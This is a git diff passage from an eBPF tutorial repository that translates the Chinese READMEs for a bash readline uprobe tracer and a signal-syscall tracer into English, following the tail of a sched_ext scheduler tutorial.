In scx_simple's weighted vtime mode, tasks with higher weights consume virtual time more slowly, allowing lower-weighted tasks to run more frequently. - -### Scheduling Cycle - -Understanding the scheduling cycle is crucial for modifying or extending scx_simple: - -1. **Task Wakeup:** - - `ops.select_cpu()` is invoked to select an optimal CPU for the waking task. - - If the selected CPU is idle, the task is dispatched immediately to the local DSQ. - -2. **Task Enqueueing:** - - `ops.enqueue()` decides whether to dispatch the task to the global DSQ, a local DSQ, or a custom DSQ based on the scheduling mode. - -3. **Task Dispatching:** - - When a CPU is ready to schedule, it first checks its local DSQ, then the global DSQ, and finally invokes `ops.dispatch()` if needed. - -4. **Task Execution:** - - The CPU executes the selected task, updating its virtual time and ensuring fair scheduling. - -This cycle ensures that tasks are scheduled efficiently while maintaining fairness and responsiveness. - -## Compiling and Running scx_simple - -Getting scx_simple up and running involves setting up the necessary toolchain and configuring the kernel appropriately. Here's how you can compile and execute the example scheduler. - -### Toolchain Dependencies - -Before compiling scx_simple, ensure you have the following tools installed: - -1. **clang >= 16.0.0** - - Required for compiling BPF programs. While GCC is working on BPF support, it lacks essential features like BTF type tags necessary for certain functionalities. - -2. **pahole >= 1.25** - - Used to generate BTF from DWARF, which is crucial for type information in BPF programs. - -3. **rust >= 1.70.0** - - If you're working with Rust-based schedulers, ensure you have the appropriate Rust toolchain version. - -Additionally, tools like `make` are required for building the examples. - -### Kernel Configuration - -To enable and use sched_ext, ensure the following kernel configuration options are set: - -```plaintext -CONFIG_BPF=y -CONFIG_SCHED_CLASS_EXT=y -CONFIG_BPF_SYSCALL=y -CONFIG_BPF_JIT=y -CONFIG_DEBUG_INFO_BTF=y -CONFIG_BPF_JIT_ALWAYS_ON=y -CONFIG_BPF_JIT_DEFAULT_ON=y -CONFIG_PAHOLE_HAS_SPLIT_BTF=y -CONFIG_PAHOLE_HAS_BTF_TAG=y -``` - -These configurations enable the necessary features for BPF scheduling and ensure that sched_ext operates correctly. - -### Building scx_simple - -Navigate to the kernel's `tools/sched_ext/` directory and run: - -```bash -make -``` - -This command compiles the scx_simple scheduler along with its dependencies. - -### Running scx_simple - -Once compiled, you can execute the user-space program to load and monitor the scheduler: - -```bash -./scx_simple -f -``` - -The `-f` flag enables FIFO scheduling mode. You can also use `-v` for verbose output or `-h` for help. - -As the program runs, it will display the number of tasks queued locally and globally every second: - -```plaintext -local=123 global=456 -local=124 global=457 -... -``` - -### Switching Between sched_ext and CFS - -sched_ext operates alongside the default Completely Fair Scheduler (CFS). You can switch between sched_ext and CFS dynamically: - -- **Enable sched_ext:** Load the BPF scheduler using scx_simple. -- **Disable sched_ext:** Terminate the scx_simple program, reverting all tasks back to CFS. - -Additionally, using SysRq key sequences like `SysRq-S` can help manage the scheduler's state and trigger debug dumps with `SysRq-D`. 
- -## Summary and Next Steps - -In this tutorial, we've introduced the **sched_ext** scheduler class and walked through a minimal example, **scx_simple**, demonstrating how to define custom scheduling behaviors using eBPF programs. We've covered the architecture, key concepts like DSQs and virtual time, and provided step-by-step instructions for compiling and running the scheduler. - -By mastering scx_simple, you're well-equipped to design and implement more sophisticated scheduling policies tailored to your specific requirements. Whether you're optimizing for performance, fairness, or specific workload characteristics, sched_ext and eBPF offer the flexibility and power to achieve your goals. - -> Ready to take your eBPF skills to the next level? Dive deeper into our tutorials and explore more examples by visiting our [tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our [website](https://eunomia.dev/tutorials/). - -## References - -- **sched_ext Repository:** [https://github.com/sched-ext/scx](https://github.com/sched-ext/scx) -- **Linux Kernel Documentation:** [Scheduler Ext Documentation](https://www.kernel.org/doc/html/next/scheduler/sched-ext.html) -- **Kernel Source Tree:** [Linux Kernel sched_ext Tools](https://github.com/torvalds/linux/tree/master/tools/sched_ext) -- **eBPF Official Documentation:** [https://ebpf.io/docs/](https://ebpf.io/docs/) -- **libbpf Documentation:** [https://github.com/libbpf/libbpf](https://github.com/libbpf/libbpf) - -Feel free to explore these resources to expand your understanding and continue your journey into advanced eBPF programming! diff --git a/src/5-uprobe-bashreadline/README.md b/src/5-uprobe-bashreadline/README.md index 20e321a..6a9f795 100644 --- a/src/5-uprobe-bashreadline/README.md +++ b/src/5-uprobe-bashreadline/README.md @@ -1,24 +1,24 @@ -# eBPF 入门开发实践教程五:在 eBPF 中使用 uprobe 捕获 bash 的 readline 函数调用 +# eBPF Tutorial by Example 5: Capturing readline Function Calls with Uprobe -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime. -本文是 eBPF 入门开发实践教程的第五篇,主要介绍如何使用 uprobe 捕获 bash 的 readline 函数调用。 +This article is the fifth part of the eBPF Tutorial by Example, which mainly introduces how to capture readline function calls in bash using uprobe. -## 什么是uprobe +## What is uprobe -uprobe是一种用户空间探针,uprobe探针允许在用户空间程序中动态插桩,插桩位置包括:函数入口、特定偏移处,以及函数返回处。当我们定义uprobe时,内核会在附加的指令上创建快速断点指令(x86机器上为int3指令),当程序执行到该指令时,内核将触发事件,程序陷入到内核态,并以回调函数的方式调用探针函数,执行完探针函数再返回到用户态继续执行后序的指令。 +uprobe is a user-space probe that allows dynamic instrumentation in user-space programs. The probe locations include function entry, specific offsets, and function returns. When we define an uprobe, the kernel creates fast breakpoint instructions (int3 instructions on x86 machines) on the attached instructions. When the program executes this instruction, the kernel triggers an event, causing the program to enter kernel mode and call the probe function through a callback function. After executing the probe function, the program returns to user mode to continue executing subsequent instructions. -uprobe基于文件,当一个二进制文件中的一个函数被跟踪时,所有使用到这个文件的进程都会被插桩,包括那些尚未启动的进程,这样就可以在全系统范围内跟踪系统调用。 +uprobe is file-based. 
When a function in a binary file is traced, all processes that use the file are instrumented, including those that have not yet been started, allowing system calls to be tracked system-wide. -uprobe适用于在用户态去解析一些内核态探针无法解析的流量,例如http2流量(报文header被编码,内核无法解码),https流量(加密流量,内核无法解密)。具体可以参考 [eBPF 实践教程:使用 uprobe 捕获多种库的 SSL/TLS 明文数据](../30-sslsniff/README.md) 中的例子。 +uprobe is suitable for parsing some traffic in user mode that cannot be resolved by kernel mode probes, such as HTTP/2 traffic (where the header is encoded and cannot be decoded by the kernel) and HTTPS traffic (which is encrypted and cannot be decrypted by the kernel). For more information, see the example in [eBPF Tutorial by Example: Capturing SSL/TLS Plaintext Data from Multiple Libraries with Uprobe](../30-sslsniff/README.md). -Uprobe 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容,避免了内核态和用户态之间的上下文切换,从而提高了 eBPF 程序的执行效率。对于 uprobe 而言,bpftime 的性能开销比 kernel 小一个数量级。 +Uprobe in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode and is compatible with kernel mode eBPF, avoiding context switching between kernel mode and user mode and thereby improving execution efficiency; for uprobes, bpftime's overhead is roughly an order of magnitude lower than that of kernel-mode eBPF. -## 使用 uprobe 捕获 bash 的 readline 函数调用 +## Capturing readline Function Calls in bash using uprobe -uprobe 是一种用于捕获用户空间函数调用的 eBPF 的探针,我们可以通过它来捕获用户空间程序调用的系统函数。 +uprobe is an eBPF probe used to capture user-space function calls, allowing us to capture system functions called by user-space programs. -例如,我们可以使用 uprobe 来捕获 bash 的 readline 函数调用,从而获取用户在 bash 中输入的命令行。示例代码如下: +For example, we can use uprobe to capture readline function calls in bash and get the command line input from the user. The example code is as follows: ```c #include <vmlinux.h> @@ -28,16 +28,6 @@ #define TASK_COMM_LEN 16 #define MAX_LINE_SIZE 80 -/* Format of u[ret]probe section definition supporting auto-attach: - * u[ret]probe/binary:function[+offset] - * - * binary can be an absolute/relative path or a filename; the latter is resolved to a - * full binary path via bpf_program__attach_uprobe_opts. - * - * Specifying uprobe+ ensures we carry out strict matching; either "uprobe" must be - * specified (and auto-attach is not possible) or the above format is specified for - * auto-attach. - */ SEC("uretprobe//bin/bash:readline") int BPF_KRETPROBE(printret, const void *ret) { @@ -49,7 +39,7 @@ int BPF_KRETPROBE(printret, const void *ret) return 0; bpf_get_current_comm(&comm, sizeof(comm)); - + pid = bpf_get_current_pid_tgid() >> 32; bpf_probe_read_user_str(str, sizeof(str), ret); @@ -61,65 +51,63 @@ int BPF_KRETPROBE(printret, const void *ret) char LICENSE[] SEC("license") = "GPL"; ``` -这段代码的作用是在 bash 的 readline 函数返回时执行指定的 BPF_KRETPROBE 函数,即 printret 函数。 +The purpose of this code is to execute the specified BPF_KRETPROBE function (printret function) when the readline function in bash returns. -在 printret 函数中,我们首先获取了调用 readline 函数的进程的进程名称和进程 ID,然后通过 bpf_probe_read_user_str 函数读取了用户输入的命令行字符串,最后通过 bpf_printk 函数打印出进程 ID、进程名称和输入的命令行字符串。 +In the printret function, we first obtain the process name and process ID of the process calling the readline function.
Then, we use the bpf_probe_read_user_str function to read the user input command line string. Lastly, we use the bpf_printk function to print the process ID, process name, and input command line string. -除此之外,我们还需要通过 SEC 宏来定义 uprobe 探针,并使用 BPF_KRETPROBE 宏来定义探针函数。 - -在 SEC 宏中,我们需要指定 uprobe 的类型、要捕获的二进制文件的路径和要捕获的函数名称。例如,上面的代码中的 SEC 宏的定义如下: +In addition, we also need to define the uprobe probe using the SEC macro and define the probe function using the BPF_KRETPROBE macro. In the `SEC` macro in the code above, we need to specify the type of the uprobe, the path of the binary file to capture, and the name of the function to capture. For example, the definition of the `SEC` macro in the code above is as follows: ```c SEC("uretprobe//bin/bash:readline") ``` -这表示我们要捕获的是 /bin/bash 二进制文件中的 readline 函数。 +This indicates that we want to capture the `readline` function in the `/bin/bash` binary file. -接下来,我们需要使用 BPF_KRETPROBE 宏来定义探针函数,例如: +Next, we need to use the `BPF_KRETPROBE` macro to define the probe function. For example: ```c BPF_KRETPROBE(printret, const void *ret) ``` -这里的 printret 是探针函数的名称,const void *ret 是探针函数的参数,它代表被捕获的函数的返回值。 +Here, `printret` is the name of the probe function, and `const void *ret` is the parameter of the probe function, which represents the return value of the captured function. -然后,我们使用了 bpf_get_current_comm 函数获取当前任务的名称,并将其存储在 comm 数组中。 +Then, we use the `bpf_get_current_comm` function to get the name of the current task and store it in the `comm` array. ```c - bpf_get_current_comm(&comm, sizeof(comm)); +bpf_get_current_comm(&comm, sizeof(comm)); ``` -使用 bpf_get_current_pid_tgid 函数获取当前进程的 PID,并将其存储在 pid 变量中。 +We use the `bpf_get_current_pid_tgid` function to get the PID of the current process and store it in the `pid` variable. ```c - pid = bpf_get_current_pid_tgid() >> 32; +pid = bpf_get_current_pid_tgid() >> 32; ``` -使用 bpf_probe_read_user_str 函数从用户空间读取 readline 函数的返回值,并将其存储在 str 数组中。 +We use the `bpf_probe_read_user_str` function to read the return value of the `readline` function from the user space and store it in the `str` array. ```c - bpf_probe_read_user_str(str, sizeof(str), ret); +bpf_probe_read_user_str(str, sizeof(str), ret); ``` -最后使用 bpf_printk 函数输出 PID、任务名称和用户输入的字符串。 +Finally, we use the `bpf_printk` function to output the PID, task name, and user input string. ```c - bpf_printk("PID %d (%s) read: %s ", pid, comm, str); +bpf_printk("PID %d (%s) read: %s ", pid, comm, str); ``` -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 +eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain combined with Wasm. Its purpose is to simplify the development, build, distribution, and running of eBPF programs. You can refer to the eunomia-bpf documentation to download and install the ecc compiler toolchain and ecli runtime. We use eunomia-bpf to compile and run this example. -编译运行上述代码: +Compile and run the above code: ```console $ ecc bashreadline.bpf.c Compiling bpf object... Packing ebpf object and config into package.json... $ sudo ecli run package.json -Runing eBPF program... +Running eBPF program...
``` -运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出: +After running this program, you can view the output of the eBPF program by checking the file `/sys/kernel/debug/tracing/trace_pipe`: ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe @@ -127,12 +115,10 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe bash-32969 [000] d..31 64002.056951: bpf_trace_printk: PID 32969 (bash) read: fff ``` -可以看到,我们成功的捕获了 bash 的 readline 函数调用,并获取了用户在 bash 中输入的命令行。 +You can see that we have successfully captured the `readline` function call of `bash` and obtained the command line entered by the user in `bash`. -## 总结 +## Summary -在上述代码中,我们使用了 SEC 宏来定义了一个 uprobe 探针,它指定了要捕获的用户空间程序 (bin/bash) 和要捕获的函数 (readline)。此外,我们还使用了 BPF_KRETPROBE 宏来定义了一个用于处理 readline 函数返回值的回调函数 (printret)。该函数可以获取到 readline 函数的返回值,并将其打印到内核日志中。通过这样的方式,我们就可以使用 eBPF 来捕获 bash 的 readline 函数调用,并获取用户在 bash 中输入的命令行。 +In the above code, we used the `SEC` macro to define an uprobe probe, which specifies the user space program (`bin/bash`) to be captured and the function (`readline`) to be captured. In addition, we used the `BPF_KRETPROBE` macro to define a callback function (`printret`) for handling the return value of the `readline` function. This function can retrieve the return value of the `readline` function and print it to the kernel log. In this way, we can use eBPF to capture the `readline` function call of `bash` and obtain the command line entered by the user in `bash`. -更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: - -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository or website to get more examples and complete tutorials. diff --git a/src/5-uprobe-bashreadline/README.zh.md b/src/5-uprobe-bashreadline/README.zh.md new file mode 100644 index 0000000..20e321a --- /dev/null +++ b/src/5-uprobe-bashreadline/README.zh.md @@ -0,0 +1,138 @@ +# eBPF 入门开发实践教程五:在 eBPF 中使用 uprobe 捕获 bash 的 readline 函数调用 + +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 + +本文是 eBPF 入门开发实践教程的第五篇,主要介绍如何使用 uprobe 捕获 bash 的 readline 函数调用。 + +## 什么是uprobe + +uprobe是一种用户空间探针,uprobe探针允许在用户空间程序中动态插桩,插桩位置包括:函数入口、特定偏移处,以及函数返回处。当我们定义uprobe时,内核会在附加的指令上创建快速断点指令(x86机器上为int3指令),当程序执行到该指令时,内核将触发事件,程序陷入到内核态,并以回调函数的方式调用探针函数,执行完探针函数再返回到用户态继续执行后序的指令。 + +uprobe基于文件,当一个二进制文件中的一个函数被跟踪时,所有使用到这个文件的进程都会被插桩,包括那些尚未启动的进程,这样就可以在全系统范围内跟踪系统调用。 + +uprobe适用于在用户态去解析一些内核态探针无法解析的流量,例如http2流量(报文header被编码,内核无法解码),https流量(加密流量,内核无法解密)。具体可以参考 [eBPF 实践教程:使用 uprobe 捕获多种库的 SSL/TLS 明文数据](../30-sslsniff/README.md) 中的例子。 + +Uprobe 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容,避免了内核态和用户态之间的上下文切换,从而提高了 eBPF 程序的执行效率。对于 uprobe 而言,bpftime 的性能开销比 kernel 小一个数量级。 + +## 使用 uprobe 捕获 bash 的 readline 函数调用 + +uprobe 是一种用于捕获用户空间函数调用的 eBPF 的探针,我们可以通过它来捕获用户空间程序调用的系统函数。 + +例如,我们可以使用 uprobe 来捕获 bash 的 readline 函数调用,从而获取用户在 bash 中输入的命令行。示例代码如下: + +```c +#include <vmlinux.h> +#include <bpf/bpf_helpers.h> +#include <bpf/bpf_tracing.h> + +#define TASK_COMM_LEN 16 +#define MAX_LINE_SIZE 80 + +/* Format of u[ret]probe section definition supporting auto-attach: + * u[ret]probe/binary:function[+offset] + * + * binary can be an absolute/relative path or a filename; the latter is resolved to a + * full binary path via bpf_program__attach_uprobe_opts.
+ * + * Specifying uprobe+ ensures we carry out strict matching; either "uprobe" must be + * specified (and auto-attach is not possible) or the above format is specified for + * auto-attach. + */ +SEC("uretprobe//bin/bash:readline") +int BPF_KRETPROBE(printret, const void *ret) +{ + char str[MAX_LINE_SIZE]; + char comm[TASK_COMM_LEN]; + u32 pid; + + if (!ret) + return 0; + + bpf_get_current_comm(&comm, sizeof(comm)); + + pid = bpf_get_current_pid_tgid() >> 32; + bpf_probe_read_user_str(str, sizeof(str), ret); + + bpf_printk("PID %d (%s) read: %s ", pid, comm, str); + + return 0; +}; + +char LICENSE[] SEC("license") = "GPL"; +``` + +这段代码的作用是在 bash 的 readline 函数返回时执行指定的 BPF_KRETPROBE 函数,即 printret 函数。 + +在 printret 函数中,我们首先获取了调用 readline 函数的进程的进程名称和进程 ID,然后通过 bpf_probe_read_user_str 函数读取了用户输入的命令行字符串,最后通过 bpf_printk 函数打印出进程 ID、进程名称和输入的命令行字符串。 + +除此之外,我们还需要通过 SEC 宏来定义 uprobe 探针,并使用 BPF_KRETPROBE 宏来定义探针函数。 + +在 SEC 宏中,我们需要指定 uprobe 的类型、要捕获的二进制文件的路径和要捕获的函数名称。例如,上面的代码中的 SEC 宏的定义如下: + +```c +SEC("uprobe//bin/bash:readline") +``` + +这表示我们要捕获的是 /bin/bash 二进制文件中的 readline 函数。 + +接下来,我们需要使用 BPF_KRETPROBE 宏来定义探针函数,例如: + +```c +BPF_KRETPROBE(printret, const void *ret) +``` + +这里的 printret 是探针函数的名称,const void *ret 是探针函数的参数,它代表被捕获的函数的返回值。 + +然后,我们使用了 bpf_get_current_comm 函数获取当前任务的名称,并将其存储在 comm 数组中。 + +```c + bpf_get_current_comm(&comm, sizeof(comm)); +``` + +使用 bpf_get_current_pid_tgid 函数获取当前进程的 PID,并将其存储在 pid 变量中。 + +```c + pid = bpf_get_current_pid_tgid() >> 32; +``` + +使用 bpf_probe_read_user_str 函数从用户空间读取 readline 函数的返回值,并将其存储在 str 数组中。 + +```c + bpf_probe_read_user_str(str, sizeof(str), ret); +``` + +最后使用 bpf_printk 函数输出 PID、任务名称和用户输入的字符串。 + +```c + bpf_printk("PID %d (%s) read: %s ", pid, comm, str); +``` + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +编译运行上述代码: + +```console +$ ecc bashreadline.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... +$ sudo ecli run package.json +Runing eBPF program... +``` + +运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe + bash-32969 [000] d..31 64001.375748: bpf_trace_printk: PID 32969 (bash) read: fff + bash-32969 [000] d..31 64002.056951: bpf_trace_printk: PID 32969 (bash) read: fff +``` + +可以看到,我们成功的捕获了 bash 的 readline 函数调用,并获取了用户在 bash 中输入的命令行。 + +## 总结 + +在上述代码中,我们使用了 SEC 宏来定义了一个 uprobe 探针,它指定了要捕获的用户空间程序 (bin/bash) 和要捕获的函数 (readline)。此外,我们还使用了 BPF_KRETPROBE 宏来定义了一个用于处理 readline 函数返回值的回调函数 (printret)。该函数可以获取到 readline 函数的返回值,并将其打印到内核日志中。通过这样的方式,我们就可以使用 eBPF 来捕获 bash 的 readline 函数调用,并获取用户在 bash 中输入的命令行。 + +更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/5-uprobe-bashreadline/README_en.md b/src/5-uprobe-bashreadline/README_en.md deleted file mode 100644 index 6a9f795..0000000 --- a/src/5-uprobe-bashreadline/README_en.md +++ /dev/null @@ -1,124 +0,0 @@ -# eBPF Tutorial by Example 5: Capturing readline Function Calls with Uprobe - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime. - -This article is the fifth part of the eBPF Tutorial by Example, which mainly introduces how to capture readline function calls in bash using uprobe. - -## What is uprobe - -uprobe is a user-space probe that allows dynamic instrumentation in user-space programs. 
The probe locations include function entry, specific offsets, and function returns. When we define an uprobe, the kernel creates fast breakpoint instructions (int3 instructions on x86 machines) on the attached instructions. When the program executes this instruction, the kernel triggers an event, causing the program to enter kernel mode and call the probe function through a callback function. After executing the probe function, the program returns to user mode to continue executing subsequent instructions. - -uprobe is file-based. When a function in a binary file is traced, all processes that use the file are instrumented, including those that have not yet been started, allowing system calls to be tracked system-wide. - -uprobe is suitable for parsing some traffic in user mode that cannot be resolved by kernel mode probes, such as HTTP/2 traffic (where the header is encoded and cannot be decoded by the kernel) and HTTPS traffic (which is encrypted and cannot be decrypted by the kernel). For more information, see the example in [eBPF Tutorial by Example: Capturing SSL/TLS Plaintext Data from Multiple Libraries with Uprobe](../30-sslsniff/README.md). - -Uprobe in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode and is compatible with kernel mode eBPF, avoiding context switching between kernel mode and user mode, thereby improving the execution efficiency of eBPF programs by 10 times. - -## Capturing readline Function Calls in bash using uprobe - -uprobe is an eBPF probe used to capture user-space function calls, allowing us to capture system functions called by user-space programs. - -For example, we can use uprobe to capture readline function calls in bash and get the command line input from the user. The example code is as follows: - -```c -#include -#include -#include - -#define TASK_COMM_LEN 16 -#define MAX_LINE_SIZE 80 - -SEC("uretprobe//bin/bash:readline") -int BPF_KRETPROBE(printret, const void *ret) -{ - char str[MAX_LINE_SIZE]; - char comm[TASK_COMM_LEN]; - u32 pid; - - if (!ret) - return 0; - - bpf_get_current_comm(&comm, sizeof(comm)); - - pid = bpf_get_current_pid_tgid() >> 32; - bpf_probe_read_user_str(str, sizeof(str), ret); - - bpf_printk("PID %d (%s) read: %s ", pid, comm, str); - - return 0; -}; - -char LICENSE[] SEC("license") = "GPL"; -``` - -The purpose of this code is to execute the specified BPF_PROBE function (printret function) when the readline function in bash returns. - -In the printret function, we first obtain the process name and process ID of the process calling the readline function. Then, we use the bpf_probe_read_user_str function to read the user input command line string. Lastly, we use the bpf_printk function to print the process ID, process name, and input command line string. - -In addition, we also need to define the uprobe probe using the SEC macro and define the probe function using the BPF_KRETPROBE macro.In the `SEC` macro in the code above, we need to specify the type of the uprobe, the path of the binary file to capture, and the name of the function to capture. For example, the definition of the `SEC` macro in the code above is as follows: - -```c -SEC("uprobe//bin/bash:readline") -``` - -This indicates that we want to capture the `readline` function in the `/bin/bash` binary file. 
- -Next, we need to use the `BPF_KRETPROBE` macro to define the probe function. For example: - -```c -BPF_KRETPROBE(printret, const void *ret) -``` - -Here, `printret` is the name of the probe function, and `const void *ret` is the parameter of the probe function, which represents the return value of the captured function. - -Then, we use the `bpf_get_current_comm` function to get the name of the current task and store it in the `comm` array. - -```c -bpf_get_current_comm(&comm, sizeof(comm)); -``` - -We use the `bpf_get_current_pid_tgid` function to get the PID of the current process and store it in the `pid` variable. - -```c -pid = bpf_get_current_pid_tgid() >> 32; -``` - -We use the `bpf_probe_read_user_str` function to read the return value of the `readline` function from the user space and store it in the `str` array. - -```c -bpf_probe_read_user_str(str, sizeof(str), ret); -``` - -Finally, we use the `bpf_printk` function to output the PID, task name, and user input string. - -```c -bpf_printk("PID %d (%s) read: %s ", pid, comm, str); -``` - -eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain combined with Wasm. Its purpose is to simplify the development, build, distribution, and running of eBPF programs. You can refer to to download and install the ecc compiler toolchain and ecli runtime. We use eunomia-bpf to compile and run this example. - -Compile and run the above code: - -```console -$ ecc bashreadline.bpf.c -Compiling bpf object... -Packing ebpf object and config into package.json... -$ sudo ecli run package.json -Running eBPF program... -``` - -After running this program, you can view the output of the eBPF program by checking the file `/sys/kernel/debug/tracing/trace_pipe`: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe - bash-32969 [000] d..31 64001.375748: bpf_trace_printk: PID 32969 (bash) read: fff - bash-32969 [000] d..31 64002.056951: bpf_trace_printk: PID 32969 (bash) read: fff -``` - -You can see that we have successfully captured the `readline` function call of `bash` and obtained the command line entered by the user in `bash`. - -## Summary - -In the above code, we used the `SEC` macro to define an uprobe probe, which specifies the user space program (`bin/bash`) to be captured and the function (`readline`) to be captured. In addition, we used the `BPF_KRETPROBE` macro to define a callback function (`printret`) for handling the return value of the `readline` function. This function can retrieve the return value of the `readline` function and print it to the kernel log. In this way, we can use eBPF to capture the `readline` function call of `bash` and obtain the command line entered by the user in `bash`. - -If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository or website to get more examples and complete tutorials. diff --git a/src/6-sigsnoop/README.md b/src/6-sigsnoop/README.md index 2a8715b..7af9ca5 100755 --- a/src/6-sigsnoop/README.md +++ b/src/6-sigsnoop/README.md @@ -1,12 +1,12 @@ -# eBPF 入门开发实践教程六:捕获进程发送信号的系统调用集合,使用 hash map 保存状态 +# eBPF Tutorial by Example 6: Capturing Signal Sending and Store State with Hash Maps -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime. 
-本文是 eBPF 入门开发实践教程的第六篇,主要介绍如何实现一个 eBPF 工具,捕获进程发送信号的系统调用集合,使用 hash map 保存状态。 +This article is the sixth part of the eBPF Tutorial by Example. It mainly introduces how to implement an eBPF tool that captures a collection of system calls that send signals to processes and uses a hash map to store state. ## sigsnoop -示例代码如下: +The example code is as follows: ```c #include @@ -87,21 +87,21 @@ int kill_exit(struct trace_event_raw_sys_exit *ctx) char LICENSE[] SEC("license") = "Dual BSD/GPL"; ``` -上面的代码定义了一个 eBPF 程序,用于捕获进程发送信号的系统调用,包括 kill、tkill 和 tgkill。它通过使用 tracepoint 来捕获系统调用的进入和退出事件,并在这些事件发生时执行指定的探针函数,例如 probe_entry 和 probe_exit。 +The above code defines an eBPF program for capturing system calls that send signals to processes, including kill, tkill, and tgkill. It captures the enter and exit events of system calls by using tracepoints, and executes specified probe functions such as `probe_entry` and `probe_exit` when these events occur. -在探针函数中,我们使用 bpf_map 存储捕获的事件信息,包括发送信号的进程 ID、接收信号的进程 ID、信号值和进程的可执行文件名称。在系统调用退出时,我们将获取存储在 bpf_map 中的事件信息,并使用 bpf_printk 打印进程 ID、进程名称、发送的信号和系统调用的返回值。 +In the probe function, we use the bpf_map to store the captured event information, including the process ID of the sending signal, the process ID of the receiving signal, the signal value, and the name of the executable for the current task. When the system call exits, we retrieve the event information stored in the bpf_map and use bpf_printk to print the process ID, process name, sent signal, and return value of the system call. -最后,我们还需要使用 SEC 宏来定义探针,并指定要捕获的系统调用的名称,以及要执行的探针函数。 +Finally, we also need to use the SEC macro to define the probe and specify the name of the system call to be captured and the probe function to be executed. -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 +eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines with Wasm. Its purpose is to simplify the development, building, distribution, and running of eBPF programs. You can refer to for downloading and installing the ecc compilation toolchain and ecli runtime. We use eunomia-bpf to compile and run this example. -编译运行上述代码: +Compile and run the above code: ```shell docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest ``` -或者 +or ```console $ ecc sigsnoop.bpf.c @@ -109,10 +109,10 @@ Compiling bpf object... Generating export types... Packing ebpf object and config into package.json... $ sudo ecli run package.json -Runing eBPF program... +Running eBPF program... ``` -运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出: +After running this program, you can view the output of the eBPF program by checking the /sys/kernel/debug/tracing/trace_pipe file: ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe @@ -122,9 +122,9 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: to PID 1527, ret = -3 ``` -## 总结 +## Summary -本文主要介绍如何实现一个 eBPF 工具,捕获进程发送信号的系统调用集合,使用 hash map 保存状态。使用 hash map 需要定义一个结构体: +This article mainly introduces how to implement an eBPF tool to capture the collection of system calls sent by processes using signals and save the state using a hash map. 
